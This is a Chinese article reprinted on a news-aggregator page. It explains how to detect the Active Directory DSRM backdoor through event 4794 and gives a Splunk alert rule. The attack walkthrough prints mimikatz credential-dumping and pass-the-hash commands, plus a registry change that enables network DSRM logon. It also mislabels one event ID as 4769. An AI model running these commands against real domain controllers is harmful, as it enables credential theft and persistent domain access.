基于AD Event日志实时检测DSRM后门

2023-01-12 09:29:24 | 来源:程序员客栈

01、简介

每个域控制器都有一个目录还原模式(DSRM)帐户,它的密码是在安装域控时设置的,实际上它对应的就是sam文件里的本地管理员“administrator”,基本很少会被重置,因此有着极强的隐蔽性。攻击者通过获取域控的DSRM密码,就可以使用帐户通过网络登录到域控服务器,从而达到权限维持的目的。


(资料图片仅供参考)

域内权限维持的方式有很多,每增加一条安全检测规则,就多一层安全保障。针对DSRM后门,基于AD Event日志能够帮助我们提供什么维度的检测,我们通过一个后门利用实例来看一下。

02、利用方式

(1)获取域内用户Hash

使用mimikatz查看域内用户test的NTLM Hash。

mimikatz # privilege::debugmimikatz # lsadump::lsa /patch /name:test

(2)将DSRM帐户和域用户的NTLM Hash同步

使用DSRM的密码和指定域用户test的密码进行同步,在命令行环境中使用ntdsutil工具重置DSRM管理员密码。

(3)抓取DSRM密码

因同步域内用户test的NTLM Hash,可以发现,DSRM Hash 和域用户test的NTLM Hash一致。

mimikatz#privilege::debugmimikatz # token::elevatemimikatz # lsadump::sam

(4)修改DSRM登录方式

DSRM 有三种登录方式,具体如下:

0:默认值,只有当域控制器重启并进入 DSRM 模式时,才可以使用 DSRM 管理员账号1:只有当本地 AD、DS 服务停止时,才可以使用 DSRM 管理员账号登录域控制器2:在任何情况下,都可以使用 DSRM 管理员账号登录域控制器

如果要使用 DSRM 账号通过网络登录域控制器,需要将该值设置为 2。

修改注册表:

reg add "HKLM\System\CurrentControlSet\Control\Lsa" /f /v DsrmAdminLogonBehavior /t REG_DWORD /d 2

(5)使用DSRM远程登录

在域成员服务器上使用DSRM进行远程登录,注意domain使用域控的主机名。

mimikatz # privilege::debugmimikatz # sekurlsa::pth /user:administrator /domain:win-dc01 /ntlm:44f077e27f6fef69e7bd834c7242b040

03、攻击检测

当攻击者尝试重置DSRM管理员密码或是指定域内用户NTLM Hash同步时,都会生成4769事件,因此可以实时监控4794事件,一旦攻击者尝试修改DSRM密码就会触发告警。

4794事件:每次更改目录还原模式(DSRM)管理员密码时,就会生成此事件,包含SID和帐户名,以及调用方工作站。

安全规则:

index=ad  EventCode=4794 | stats count earliest(_time) AS start_time latest(_time) AS end_time  by dest user| eval start_time=strftime(start_time,"%Y-%m-%d %H:%M:%S")| eval end_time=strftime(end_time,"%Y-%m-%d %H:%M:%S") | eval message="在"+start_time+"到"+end_time+"时间内,域控服务器:"+dest +" 疑似DSRM域后门行为,试图设置目录服务还原模式管理员密码"+count+"次,操作账号:"+user| table start_time end_time user message

安全告警效果如下图:

上一篇 下一篇

相关新闻

基于AD Event日志实时检测DSRM后门

形容高层领导力的句子(精选166句)

环球观热点:欧盟2022年三季度经常账户赤字达902亿欧元

每日看点!【天气】明夜开始,雨水登场,猛烈的冷暖反转即将上演

唐山护照到期办理换证需要什么材料

当前快讯:徐巧芯轰绿不认错 林智坚伤害持续到2024

世界即时看!元宇宙产品如何从 0 到 1 ?无界社区助力冷启动

倍益康:公司保健制氧机目前日产量超百台 处于供不应求情况

全球即时看!得润电子: 中信证券股份有限公司关于公司继续使用部分闲置募集资金进行现金管理的核查意见

23河南债10票面利率为2.9300%

焦点速递!世界第一虚拟乐队举办了一场 AR 音乐会 #Gorillaz

全球播报:广发e秒贷逾期九个月没还会有什么后果?

吴忠土地赔偿律师要给多少钱

小袋鼠借款逾期大概是多久会上征信|世界观察

环球热头条丨请问在我国诉讼离婚加急是怎么样的?

最新新闻

基于AD Event日志实时检测DSRM后门

形容高层领导力的句子(精选166句)

环球观热点:欧盟2022年三季度经常账户赤字达902亿欧元

每日看点!【天气】明夜开始,雨水登场,猛烈的冷暖反转即将上演

唐山护照到期办理换证需要什么材料

当前快讯:徐巧芯轰绿不认错 林智坚伤害持续到2024

世界即时看!元宇宙产品如何从 0 到 1 ?无界社区助力冷启动

倍益康:公司保健制氧机目前日产量超百台 处于供不应求情况

全球即时看!得润电子: 中信证券股份有限公司关于公司继续使用部分闲置募集资金进行现金管理的核查意见

23河南债10票面利率为2.9300%

焦点速递!世界第一虚拟乐队举办了一场 AR 音乐会 #Gorillaz

全球播报:广发e秒贷逾期九个月没还会有什么后果?

吴忠土地赔偿律师要给多少钱

小袋鼠借款逾期大概是多久会上征信|世界观察

环球热头条丨请问在我国诉讼离婚加急是怎么样的?

多国机构和专家:限制中国旅客入境,没必要:天天看热讯

天天讯息:滨城新增2家市级新型研发机构

【天天新要闻】运营人的两个发展路径

环球百事通!2022年菲律宾5G业务普及缓慢,因用户负担不起兼容手机

天天播报:拍拍贷网贷逾期45年拖欠多久上征信系统

快消息!一周公告合辑丨黄光裕再减持国美零售 融创走出“至暗时刻”

全球滚动:肝硬化早期时,身体或会出现5个“迹象”,千万莫大意

安徽砀山:师生进警营 体验“警”彩纷呈|世界新视野

马不停蹄 办结执行案件

天地在线(002995)龙虎榜数据(01-05)

环球观焦点:沧州926路公交车票价是多少?(附发车时间+路线)

天娱数科:公司股东人数会在定期报告中披露,截至2022年9月30日,公司股东总户数为66,747户

焦点!A股异动 | 中鼎股份涨约7% 市值重回200亿元 增量业务订单饱满

中加特IPO:应收账款及合同资产逾期过半 代理模式饱受争议

环球观热点:何绍基日记里的永州风景